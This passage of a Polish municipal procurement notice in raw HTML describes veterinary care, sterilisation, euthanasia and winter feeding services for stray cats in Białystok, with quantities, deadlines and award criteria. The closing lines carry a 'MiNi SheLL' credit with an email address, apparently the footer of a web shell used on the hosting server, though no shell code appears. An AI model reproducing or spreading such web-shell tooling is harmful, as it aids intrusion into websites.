ilości ruchu; 3)  zapewnienie stałego dozoru i opieki weterynaryjnej wraz z wykonywaniem niezbędnych zabiegów weterynaryjnych; Przewidywana ilość zabiegów: 1 podstawowa opieka weterynaryjna nad 1 kotem, w tym: odrobaczenie, odpchlenie, leczenie chorób wirusowych, leczenie świerzbu usznego, szczepienia - x 10 usług, 2 sterylizacja  1 kotki - x 1 zabieg, 3 kastrację  1 kocura - x  1 zabieg, 4 uśpienie i utylizacja 1 ślepego kociaka - x 5 zabiegów, 5 eutanazja i utylizacja 1 kota - x 5 zabiegów, 6 wykonanie 1 badania (rtg, usg, gastroskopii itp.) - x 4 badania, 7 wykonanie 1 zabiegu wraz z narkozą  (zabieg chirurgiczny, operacja złamania, wyszycie cewki, zabieg dentystyczny itp.) - x 4 zabiegi; 4)   utylizacja zwłok zwierzęcych i innych odpadów organicznych; 5) prowadzenie dokumentacji, obejmującej: a) bieżącą dokumentację przyjmowanych zwierząt, w tym dokumentację zdjęciową przyjmowanych zwierząt, b) rejestr wykonywanych usług wg karty zwierzęcia ( zgodnie ze wzorem przekazanym przez Zamawiającego w terminie 5 dni od dnia podpisania umowy), c) miesięczne raporty z realizacji niniejszej umowy przekazywane Zamawiającemu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.20.00.00-1, 98.39.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeprowadzenie jesienno-zimowego dokarmiania kotów wolno żyjących kotów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie jesienno-zimowego dokarmiania wolno żyjących kotów we współpracy ze społecznymi opiekunami kotów wraz z zakupem karmy. 2. Szczegółowy opis przedmiotu zamówienia: 1) zakup w terminie do dnia 16 października 2014 r.  600 kg suchej karmy i 100 kg mokrej karmy dla kotów, 2) przeprowadzenie jesienno-zimowego dokarmiania wolno żyjących kotów we współpracy ze społecznymi opiekunami kotów, wpisanymi do rejestru społecznych opiekunów kotów prowadzonego przez Departament Ochrony Środowiska i Gospodarki Komunalnej Urzędu Miejskiego w Białymstoku, w sposób zapewniający im dobrą zdrowotność i kondycję, w tym: przechowywanie i przekazywanie zakupionej karmy, prowadzenie ewidencji i przekazywanie raportów w terminie od dnia 16 października 2014 r. do dnia 15 marca 2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.39.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com